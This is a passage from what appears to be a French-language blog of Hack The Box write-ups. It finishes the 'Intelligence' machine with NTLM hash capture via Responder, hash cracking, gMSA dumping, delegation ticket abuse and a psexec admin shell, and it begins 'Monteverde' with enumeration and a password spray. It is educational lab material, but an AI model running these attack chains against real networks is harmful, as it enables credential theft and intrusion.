class="line"><span class="cl">smb: <span class="se">\&gt;</span> get downdetector.ps1 </span></span><span class="line"><span class="cl">getting file <span class="se">\d</span>owndetector.ps1 of size <span class="m">1046</span> as downdetector.ps1 <span class="o">(</span>13.4 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 13.4 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 17:13:40 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># cat downdetector.ps1 </span> </span></span><span class="line"><span class="cl">��# Check web server status. Scheduled to run every 5min </span></span><span class="line"><span class="cl">Import-Module ActiveDirectory </span></span><span class="line"><span class="cl">foreach<span class="o">(</span><span class="nv">$record</span> in Get-ChildItem <span class="s2">&#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> Where-Object Name -like <span class="s2">&#34;web*&#34;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"><span class="nv">$request</span> <span class="o">=</span> Invoke-WebRequest -Uri <span class="s2">&#34;http://</span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2">&#34;</span> -UseDefaultCredentials </span></span><span class="line"><span class="cl"><span class="k">if</span><span class="o">(</span>.StatusCode -ne 200<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">Send-MailMessage -From <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -To <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -Subject <span class="s2">&#34;Host: </span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2"> is down&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">{}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>L&rsquo;idée est donc:</p> <ul> <li>Créer un record DNS commençant par &ldquo;web&rdquo; avec le compte de Tiffany</li> <li>Mettre en place un <strong>responder</strong>, qui attend de recevoir une requête et nous donnera un hachage</li> <li>Déchiffrer le hachage.</li> </ul> <h3 id="new-dns-record">New DNS Record </h3><p>On crée un nouveau DNS record : <strong>web666</strong>. Il pointe vers notre IP. Pour cela on peut utiliser l&rsquo;outil <strong>dnstool.py</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dnstool.py -u <span class="s1">&#39;intelligence.htb\Tiffany.Molina&#39;</span> -p <span class="s1">&#39;NewIntelligenceCorpUser9876&#39;</span> -r web666 -a add -d 10.10.16.10 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Connecting to host... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Binding to host </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bind OK </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Adding new record </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> LDAP operation completed successfully </span></span></code></pre></td></tr></table> </div> </div><h3 id="responder">Responder </h3><p>On se met en attente d&rsquo;une requête, avec la commande <strong>responder</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 22:43:49 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># responder -I tun0 -w -F </span> </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Client : 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Username : intelligence<span class="se">\T</span>ed.Graves </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:BF2803FDDC9EEF7CD931A308E83AAF83:0101000000000000579387554E1DDC014DF34E0577DDBE3A0000000002000800510054003200360001001E00570049004E002D00440046003200570030004700530042004500390050000400140051005400320036002E004C004F00430041004C0003003400570049004E002D00440046003200570030004700530042004500390050002E0051005400320036002E004C004F00430041004C000500140051005400320036002E004C004F00430041004C00080030003000000000000000000000000020000027B3134561E5EAEC1547E28450320466E1AC51EF296269768842659E2D2AD00B0A001000000000000000000000000000000000000900380048005400540050002F007700650062003600360036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ted-ntlmv2-hash">Ted NTLMv2 Hash </h3><p>On effectue une attaque par dictionnaire sur le hachage NTLMv2 de Ted.graves et on obtient les credentials suivants : Ted : <code>Mr.Teddy</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">TED.GRAVES::intelligence:112.......000:Mr.Teddy </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5600</span> <span class="o">(</span>NetNTLMv2<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: TED.GRAVES::intelligence:1122334455667788:bf2803fdd...000000 </span></span><span class="line"><span class="cl">Time.Started.....: Wed Sep <span class="m">3</span> 22:47:36 <span class="m">2025</span> <span class="o">(</span><span class="m">2</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Wed Sep <span class="m">3</span> 22:47:38 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u Ted.graves -p <span class="s1">&#39;Mr.Teddy&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>ed.graves:Mr.Teddy </span></span></code></pre></td></tr></table> </div> </div><h2 id="tedgraves---svc_int">Ted.Graves -&gt; svc_int$ </h2><h3 id="readgmsapassword-right-on-svc_int">ReadGMSAPassword Right on svc_int$ </h3><p>En utilisant bloodhound, on découvre que Ted.Graves fait parti du groupe <strong>ITSupport</strong> qui a le droit <strong>ReadGMSAPassword</strong> sur l&rsquo;utilisateur <strong>svc_int$</strong>.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int.png" width="1134" height="731" srcset="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_c713dae335ef7ad7.png 480w, https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_3e23e0760d3b044d.png 1024w" loading="lazy" alt="bloodhound: Ted -&gt; svc_int" class="gallery-image" data-flex-grow="155" data-flex-basis="372px" ></p> <p>En utilisant la commande gMSADumper.py on peut alors dumper le hachage de <strong>svc_int$</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gMSADumper.py -u <span class="s1">&#39;Ted.Graves&#39;</span> -p <span class="s1">&#39;Mr.Teddy&#39;</span> -d <span class="s1">&#39;intelligence.htb&#39;</span> </span></span><span class="line"><span class="cl">Users or groups who can <span class="nb">read</span> password <span class="k">for</span> svc_int$: </span></span><span class="line"><span class="cl"> &gt; DC$ </span></span><span class="line"><span class="cl"> &gt; itsupport </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl">svc_int$:aes256-cts-hmac-sha1-96:331c8820d64c744ba82a28551b76dc2dc00991df0e253fa613d37c4684e045fd </span></span><span class="line"><span class="cl">svc_int$:aes128-cts-hmac-sha1-96:40122d8d49ee8c46ea793c19b3a59d08 </span></span></code></pre></td></tr></table> </div> </div><h2 id="svc_int---administrator">svc_int$ -&gt; Administrator </h2><h3 id="msds-allowedtodelegateto--wwwdcintelligencehtb">msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb </h3><p>On remarque que svc_int peut : msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb</p> <p>Ce qui veut dire que svc_int$ peut se faire passer pour un autre utilisateur uniquement vers le service WWW/dc.intelligence.htb. On peut aussi voir ce resultat directement dans bloodhound.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.10.248 -D <span class="s2">&#34;intelligence\Ted.Graves&#34;</span> -w <span class="s2">&#34;Mr.Teddy&#34;</span> -b <span class="s2">&#34;DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> grep -i msDS-AllowedToDel -A20 -B40 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># svc_int, Managed Service Accounts, intelligence.htb</span> </span></span><span class="line"><span class="cl">dn: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">objectClass: top </span></span><span class="line"><span class="cl">objectClass: person </span></span><span class="line"><span class="cl">objectClass: organizationalPerson </span></span><span class="line"><span class="cl">objectClass: user </span></span><span class="line"><span class="cl">objectClass: computer </span></span><span class="line"><span class="cl">objectClass: msDS-GroupManagedServiceAccount </span></span><span class="line"><span class="cl">cn: svc_int </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>h </span></span><span class="line"><span class="cl"> tb </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="silver-ticket--impersonate-administrator">Silver Ticket : impersonate Administrator </h3><p>On peut maintenant se faire passer pour l&rsquo;administrateur en générant un silver ticket pour le SPN WWW/dc.intelligence.htb.</p> <p>On utilise ensuite <strong>psexec</strong> pour obtenir un powershell en tant qu&rsquo;admin avec le ticket généré :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -dc-ip 10.10.10.248 -hashes :1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Impersonating Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2self </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ mv Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache admin.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;admin.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file RKiuvsgB.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service MGRO on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service MGRO..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.1879<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">8fa6.....9f53 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><p>Parfois bloodhound n&rsquo;affiche pas toutes les informations. Par exemple, je ne voyais pas la route de Ted vers svc_int.</p> <p>En effet, j&rsquo;ai l&rsquo;habitude de cliquer sur <strong>Outbound Object Control</strong>-&gt; <strong>Transitive Object Control</strong>.</p> <p>Mais il fallait faire :</p> <ul> <li><strong>Outbound Object Control</strong> -&gt; <strong>Group Delegated Object Control</strong></li> </ul> <p>Attention donc à bien regarder toutes les possibilités de <strong>Outbound Object Control</strong> sur un utilisateur owned.</p> <ul> <li> <p>Allowed To Delegate : WWW/dc.intelligence.htb Il faut regarder chaque parametre de l&rsquo;utilisateur sur bloodhound. J&rsquo;aurais dû reperer cela. Tout ne saute pas forcement aux yeux.</p> </li> <li> <p>psexec.py -k -no-pass <a class="link" href="mailto:intelligence.htb/Administrator@dc.intelligence.htb" >intelligence.htb/Administrator@dc.intelligence.htb</a> Pour <strong>psexec</strong>, attention ici j&rsquo;ai du préciciser <a class="link" href="mailto:Administrator@dc.intelligence.htb" >Administrator@dc.intelligence.htb</a> au lieu de l&rsquo;ip que j&rsquo;avais mis initialement : <a class="link" href="mailto:Administrator@10.10.10.248" >Administrator@10.10.10.248</a>. Il faut bien sûr que **dc.intelligence.htb **soit bien dans le /etc/hosts.</p> </li> </ul>https://leopoldabgn.github.io/writeups/p/monteverde-htb/Sun, 20 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monteverde-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Monteverde cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Monteverde</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.172</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">mhope:4n0therD4y@n0th3r$ </span></span><span class="line"><span class="cl">administrator:d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.172 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-17 23:38 CEST </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-07-17 21:39:43Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49673/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49674/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49676/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49696/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49750/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">No OS matches <span class="k">for</span> host </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="getting-users-using-nxc">Getting users using nxc </h3><p>Avec <code>nxc smb</code> et l&rsquo;utilisateur anonyme on récupère une liste d&rsquo;utilisateurs.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u <span class="s1">&#39;&#39;</span> -p <span class="s1">&#39;&#39;</span> --users <span class="p">|</span> tr -s <span class="s1">&#39; &#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39; &#39;</span> -f <span class="m">5</span> <span class="p">|</span> head -n13 <span class="p">|</span> tail -n <span class="m">10</span> <span class="p">|</span> tee users.txt </span></span><span class="line"><span class="cl">Guest </span></span><span class="line"><span class="cl">AAD_987d7f2f57d2 </span></span><span class="line"><span class="cl">mhope </span></span><span class="line"><span class="cl">SABatchJobs </span></span><span class="line"><span class="cl">svc-ata </span></span><span class="line"><span class="cl">svc-bexec </span></span><span class="line"><span class="cl">svc-netapp </span></span><span class="line"><span class="cl">dgalanos </span></span><span class="line"><span class="cl">roleary </span></span><span class="line"><span class="cl">smorgan </span></span></code></pre></td></tr></table> </div> </div><h3 id="password-spray">Password Spray </h3><p>On tente un <strong>password spray</strong> avec &ldquo;user == password&rdquo; et on découvre les identifiants suivants:</p> <ul> <li><code>SABatchJobs:SABatchJobs</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success --no-bruteforce </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:MONTEVERDE<span class="o">)</span> <span class="o">(</span>domain:MEGABANK.LOCAL<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\G</span>uest:Guest STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\A</span>AD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\m</span>hope:mhope STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>+<span class="o">]</span> MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> 